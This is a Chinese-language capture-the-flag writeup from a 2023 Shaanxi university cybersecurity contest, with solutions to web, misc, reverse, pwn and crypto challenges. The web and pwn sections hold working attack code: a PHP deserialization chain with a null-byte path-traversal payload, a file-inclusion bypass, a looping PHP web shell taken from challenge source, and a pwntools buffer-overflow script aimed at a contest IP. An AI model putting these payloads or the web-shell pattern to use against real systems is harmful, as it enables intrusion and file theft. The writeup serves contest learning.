陕西省大学生网络安全技能大赛 2023 Writeup

2023年06月03日技术约 1.8k 字大概 9 分钟

Web

ezpop

<?php
highlight_file(__FILE__);

class night
{
    public $night;

    public function __destruct(){
        echo $this->night . '哒咩哟';
    }
}

class day
{
    public $day;

    public function __toString(){
        echo $this->day->go();
    }

    public function __call($a, $b){
        echo $this->day->getFlag();
    }
}


class light
{
    public $light;

    public function __invoke(){
        echo $this->light->d();
    }
}

class dark
{
    public $dark;

    public function go(){
        ($this->dark)();
    }

    public function getFlag(){
        include(hacked($this->dark));
    }
}

function hacked($s) {
    if(substr($s, 0,1) == '/'){
        die('呆jio步');
    }
    $s = preg_replace('/\.\.*/', '.', $s);
    $s = urldecode($s);
    $s = htmlentities($s, ENT_QUOTES, 'UTF-8');
    return strip_tags($s);
}

$un = unserialize($_POST['‮⁦快给我传参⁩⁦pop']); //
throw new Exception('seino');
Fatal error: Uncaught Exception: seino in /var/www/html/pophr3bXo.php:60 Stack trace: #0 {main} thrown in /var/www/html/pophr3bXo.php on line 60

include() 的时候调用了一个过滤函数 hacked()，不允许 /，和 ../ 开头，我们一般知道 flag 的位置一般是 /flag ，我们尝试使用 %00 进行绕过过滤，其次由于传参的参数名存在 UNICODE 编码，传参的时候参数名需要去 VSCode复制

<?php
class night
{
    public $night;
}

class day
{
    public $day;
}


class light
{
    public $light;
}


class dark
{
    public $dark;
}

$flag = new night();
$flag -> night = new day();
$flag -> night -> day = new dark();
$flag -> night -> day -> dark = new light();
$flag -> night -> day -> dark -> light = new day();
$flag -> night -> day -> dark -> light -> day = new dark();
$flag -> night -> day -> dark -> light -> day -> dark = '.%00%00./%00.%00%00./%00.%00%00./flag';

var_dump(urlencode(serialize($flag)));

我们可以通过 fast destruct 提前触发魔术方法，从而绕过 throw 语句，注意我们传递 payload 的时候，需要将最后面的 } 删掉

easyrce

<?php
error_reporting(0);
highlight_file(__FILE__);

if (!empty($_GET['PK'])){
    $PK = $_GET['PK'];
    if(blacklistFilter($_SERVER["QUERY_STRING"])){
        include $PK;
    }else{
        highlight_file(__FILE__);
    }
}

function blacklistFilter($arg) {
    $blacklist = array('[', ']', ';', '?', '@', '(', ')', 'exec', 'eval', '$', 'phpinfo', 'flag', 'data', 'filter', '#');
    $filteredInput = str_replace($blacklist, '', $arg);
    return $filteredInput;
}

直接传递 ?PK=/flag 即可

mua

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = 'shell.php';
    $code = '<?php if(md5($_GET["pass"])==="c9b30e9fad74c62c2d0e4bb820964913"){ if(strlen($_GET[\'cmd\'])<9){ @system($_GET[\'cmd\']); } } ?>';
    while (1){
        file_put_contents($file,$code);
    usleep(5000);
?>

访问 robots.txt 得到一个文件

1	`Disallow: /substr_pass.php`

访问 /substr_pass.php 后得到

1	`<p style="display:none">hint:?a=xx&b=xx</p>`

直接根据他的提示尝试传参，发现传递 ?a=0&b=3 这种数值时会存在回显，直接写个脚本跑一下

import requests
url = 'http://0298339a.clsadp.com/substr_pass.php?a={}&b=3'

for i in range(100):
    r = requests.get(url.format(i)).text
    if 'hacker' not in r:
        print(r[0], end='')
# password是富强民主文明和谐自由平等公正法制爱国敬业诚信友善

最后根据得到密码，直接读 flag 即可，这里贴一下 substr_pass.php 的源码

<?php
	header("Content-type:text/html;charset=utf-8");
	$pass = "password是富强民主文明和谐自由平等公正法制爱国敬业诚信友善";
	$a = $_GET['b'];
	$b = $_GET['a'];
	if(isset($a)&&isset($b))
	{
		if($a<4)
		{
			if($b<84)
			{
				$pass = substr($pass,$b,$a);
				echo $pass;
			}
			else
				echo "hacker你想干嘛？";
		}
		else
			echo "hacker你想干嘛？";
	}
	echo "<p style=\"display:none\">hint:?a=xx&b=xx</p>";
?>

Misc

云缨

8881088410842088810810842042108108821041010882108881
// 云影密码解密
YUNYINGISEASY
// MD5
flag{9edabf1448871181eb0e7133b5b3d701}

hack_dns

小明是一名网络安全爱好者，最近对DNS隧道技术产生了浓厚的兴趣。他决定通过学习和实践来深入了解这项技术。在学习的过程中，他遇到了一个挑战，需要解析一个包含隐藏数据的流量包，并将其中的数据还原出来。

首先通过爆破得到解压密码 258369，然后根据题目描述着重观察一下 DNS 流量，发现一直请求 *.test.com 且前面像是 16 进制

直接 tshark 导出处理一下

1	`tshark -r flag.pcap -Y "dns.flags.response == 0 && not icmp" -T fields -e dns.qry.name > output.txt`

然后直接上脚本进行分析

str = ''

with open("output.txt", "r") as file:
    for line in file:
        if 'test.com' in line:
            line = line.replace('.test.com', '').strip()
            str += line

decoded_str = bytes.fromhex(str.replace('\n', '').replace('0a', '')).decode('utf-8')
print(decoded_str)
# dxhy{6je0cm1l6x897033ig0a1rh40915v659}

又得到了一段密文，然后我们结合题目附件中的 key.jpg，进行分析一下，首先图片备注中给出了一段密文，直接通过文本加密为韩文进行解密，同时发现图片尾部发现一段 base64

폼줜폼쁌폼켶폼븸폼걃폼켶폼횺폼즅완윓췷킒쑬땱튓켏윋뙫쑬텱==
// key1=ymh好像只有一半
a2V5Mj1zZWMg6L+Z5aW95YOP5Y+q5pyJ5LiA5Y2K
// key2=sec 这好像只有一半

最后直接用 ymhsec 尝试维吉尼亚密码解密得到 flag

Reverse

ezpython

根据题目名和图标，一眼 pyinstaller 生成的可执行文件，直接 pyinstxtractor 反编译即可

import sys
str = 'cidb~071c75g62=a=d2=acc211c010`1<`gacx'
str1 = ''
flag = input('输入你的flag：')
if len(flag) != 38:
    print('The length you enter is 38.......no no no no not flag')
    sys.exit()
for i in range(38):
    str1 += chr(ord(flag[i]) ^ 5)
if str1 == str:
    print('yes is flag')
else:
    print('no no no no........')

直接简单改改，得到 flag

str = 'cidb~071c75g62=a=d2=acc211c010`1<`gacx'
str1 = ''
for i in range(38):
    str1 += chr(ord(str[i]) ^ 5)
print(str1)
# flag{524f20b378d8a78dff744f545e49ebdf}

ezpe

通过 16 进制编辑器打开发现 key1

1 2	`Yes,you found me!Now I can tell you,flag is flag{key1_key2},but where is the key???Do not frustrated!I can give you key1,key1:w0w! Now go find key2! // key1:w0w!`

同时在文件底部得到一段 BrainFuck 编码，解码后得到 key2

1
2

+++++ +++++ [->++ +++++ +++<] >++++ +++.- ----- .<+++ +[->+ +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- -.+++ +++++ .<+++ +[->+ +++<] >++++ ++.<+ ++[-> ---<] >--.< +++++ [->++ +++<] >+.<+ +++[- >++++ <]>++ ++.<+ ++++[ ->--- --<]> ----- -.<++ +++[- >---- -<]>- ----- --.<+ +++++ ++[-> +++++ +++<] >++.< ++++[ ->--- -<]>- -.<++ ++[-> ++++< ]>+.< +++++ [->-- ---<] >---- --.<+ ++++[ ->--- --<]> ----- ----. <++++ +++[- >++++ +++<] >+.-- ----. <++++ ++[-> ----- -<]>- ----- ----. <+++[ ->--- <]>-- --.<+ +++++ +[->+ +++++ +<]>+ +++++ ++++. <++++ [->++ ++<]> ++++. ++.<+ +++++ +[->- ----- -<]>- -.<++ +++++ [->++ +++++ <]>+. <++++ ++++[ ->--- ----- <]>-- -.<++ +++++ [->++ +++++ <]>++ +.<
// key2:PE_sT3uctU3e_1$_suBt1e

Pwn

stack

from pwn import *

p = remote('60.204.130.55', 10005)

p.recvuntil("What's your name?")
p.sendline(b'aaaa')

p.recvuntil("How old are you?")
payload = b'A' * 152 + p64(0x400831)
p.sendline(payload)

p.interactive()

Crypto

背包里有个小e

from Crypto.Util.number import inverse, long_to_bytes

q = 1062782236711649143256943253688230795248096679
c = 983161176381023293496701819911713412403621435996600357077248212597051984952060369492776116
R = [10, 20, 56, 116, 250, 604, 1785, 3764, 10420, 26174, 64277, 142686, 339271, 784925, 1774483, 4513554, 12574060, 32149722, 93361078, 202517682, 588442152, 1230453555, 3254020661, 8727469271, 20147071892, 54640104343, 151442207183, 445000053230, 914606176446, 2691450122023, 6025302022648, 15075433850288, 30214089829275, 65227232043565, 139778140650563, 369925682275512, 949714768473427, 2105904592390310, 4914427026380821, 10757449211501496, 23050018815822428, 56999175100749523, 119259915665772416, 293870286338851372, 770246244388062705, 1647923648343663480, 3808869578215042579, 9793878830950371419, 21763428671462086959, 45757034778249840595, 112968528111764693855, 240029343597222349804, 560678930857967344758, 1298162275703915199010, 3823036799197030061860, 8145352084725391184437, 20097317476701585458448, 57857034617384501902995, 167861822547393570172762, 372858814139306344735385, 1087295870157428349383513, 2640148234440084242960844, 6622875296243574520689384, 18570945225061795740099215, 44017906828655608052158550, 97317100505226367855489455, 202155504476126598272882135, 585679554604127986464879340, 1664545898441459275075390046, 3604762580887702181791945097, 9081583430545692984723398552, 26947586381003574921231698326, 61728122735600023624840846162, 155056868560214515089169378260, 397837421070719439621972784221, 1044263092263086773196885199567, 2842164485700169740560864540292, 6158888459112137420571470200973, 13332707741922654309118551782506, 28861201051441325698302866955486, 82032082040065450739476296843608, 217889479575329002869914223263923, 555945102084646653454108307375752, 1548682791834377332871031584311291, 3757860013368899814716211525805218, 7877350828703609247361685132098268, 16552674199222773396227321803632717, 49310968705673838114822412496087919, 119896848947801472882210821743659192, 246840756958386193725893543708486956, 550954993699753149382877043839683648, 1212879093285682674613228786282450230, 2516234147199103678704149631306001942, 5122044009168632148386809983975370904, 14749557498439515099629706789721285673, 32146803210745019766197032394376999848, 83267801178922620546613211942145456468, 220275723095364783936447627339002044695, 493414367960715117911791606612069534963, 1392221083150439458092715171406886216820, 3183942306979020264632411284534770729988, 9244760653244976919670674765917154154433, 19088421242697289011450114796569680495410, 40416628293425853465050792794855131155767, 102116633306198170357170067423508110575976, 227277032457742340336612735110719095672694, 619907260835641293381831580578615001558978, 1512778870037106477781340650274547330127117, 4043168404086154151861279795071865355441883, 10330704486609131315313732978036754163805081, 24529644187712561554033802847438821250621404, 53014176633918398409677359044329945740792107, 123467132049736217121207166203674755383724045, 322851607642471091487630766914774844693522137, 710830373760058207081889256711298798748104158, 1423897802215838505778009877234711247758811844, 3690210274392987745770258964442206250442129893, 9775541687048334546465030877846487194534319303, 24051879376871745352502813841331588227141616666, 59512015711961402263690402829989865262082942201, 168586256483711850114158105226125923731322865485, 339000720658343273716234989743921896249537996525, 815792665280689101372017973380211965687154108739, 1819683947681841711925085824750249487582034645028, 3753817468108207702879116405206977073924527001678, 10140303468902625836203104297663006421652353644791, 27589302363964253128263531817988442778796823545503, 66595246178324235504040809010077291044678101018321, 171169778993933758462354186734144919918938111903087, 448684299677297225260676523985058038365651161887526, 901112792634281977113529440543337701631368200707245, 1880632683706461197915265008125417460621679621489042, 5632823388986948279095935644540059675128326956026545, 13660545163895218636949966532272293026396221070923701, 37023886509875418406806450165875176360850044050625045, 100355433598829041760850479110561847843652622482526713, 283871853948489945344372858536768007918630015880390584, 620279993363251981967903968442622022653950722280940957, 1827182154519631057787495772932009755904080027464326502, 4502141834345370318696832880478693010721568515354038809, 9641587412952464112793315092379538014320918115965729694, 25206363653216482184115175991586414198392785849271926044, 66430427009675817187960040784708373625578269100430229079, 147996824987971424210362707800724888653196426277715815491, 338630792112184884689171982291910991251345007800173341986, 861659819343535690253504207338242088841891705792525397367, 2160574116696290836636610705193868120099363331710642458358, 4694790313099040730607720285766854284869683176151164709112, 10624668885969654258748574456709749409979114479719657272356, 22396164555821525784673028261747345078110653875353255510399]
S = 1152869203189708302662513064730278529733889476442489893777042
A = 739143501457751145971738620631
B = 61338711994428897029768502345417660825850307334052861593436


res = S * inverse(A, B) % B
plist = []

for i in reversed(R):
    plist.append(int(res >= i))
    res -= i * plist[-1]

p = int(''.join(map(str, reversed(plist))), 2)
n = p * q
mp = pow(c, (p + 1) // 4, p)
mq = pow(c, (q + 1) // 4, q)

for kp in (-1, 1):
    for kq in (-1, 1):
        m = (kp * mp * q * inverse(q, p) + kq * mq * p * inverse(p, q)) % n
        if b'flag{' in long_to_bytes(m):
            print(long_to_bytes(m))

文章分类

文章归档